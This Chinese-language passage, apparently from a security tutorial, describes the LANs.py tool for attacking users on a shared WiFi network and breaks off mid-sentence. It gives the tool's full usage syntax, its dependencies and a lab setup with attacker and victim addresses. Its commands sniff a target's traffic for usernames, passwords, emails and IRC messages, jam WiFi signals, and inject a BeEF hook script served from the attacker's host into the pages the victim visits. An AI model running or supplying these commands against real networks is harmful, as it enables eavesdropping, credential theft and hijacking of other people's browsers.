1. 自动寻找当前网络中最为活跃的WLAN用户,并对其中的一名用户实施监控,然后向该用户所访问的Web页面注入任意HTML或JavaScript代码;
2. 干扰附近的WiFi网络,干扰范围取决于无线网卡的性能。我们可以通过修改配置来实现干扰所有人的WiFi信号或仅干扰某一特定用户的WiFi信号。但是LANs.py不支持对用户同时进行WiFi干扰和监听。
依赖组件
Linux、python-scapy、python-nfqueue(nfqueue-bindings 0.4-3)、aircrack-ng、python-twisted、BeEF (optional)、nmap、nbtscan、tcpdump。(如果你不知道目标用户的IP地址,那么你还需要一块支持混杂模式的无线网卡)
测试环境为Kali Linux,发动攻击的设备地址为192.168.0.5,目标设备的IP地址为192.168.0.10。
Python LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS][-vmac VICTIMMAC] [-d] [-v] [-dns DNSSPOOF] [-a][-set] [-p] [-na] [-n] [-i INTERFACE] [-r REDIRECTTO][-rip ROUTERIP] [-rmac ROUTERMAC] [-pcap PCAP][-s SKIP] [-ch CHANNEL] [-m MAXIMUM] [-no] [-tTIMEINTERVAL] [--packets PACKETS] [--directedonly] [--accesspointACCESSPOINT]
目前该工具支持从以下协议收集数据:HTTP、FTP、IMAP、POP3和IRC。LANs.py将会打印出URL地址所返回的资源中前135个字符,并自动忽略结尾是.jpg、.jpeg、.gif、.css、.ico、.js、.svg和.woff的URL地址。除此之外,它还能够输出任意协议下传输的用户名/密码、以及接收或发送的电子邮件和IRC消息。
python LANs.py -u -p
python LANs.py -u -p -d -ip 192.168.0.10
-d:查看所有的图片
-ip:设置目标IP地址
python LANs.py -bhttp://192.168.0.5:3000/hook.js
向目标用户所访问的页面中注入一个BeEF钩子( http://beefproject.com/ ,【 参考教程 】),注入的参数会包裹在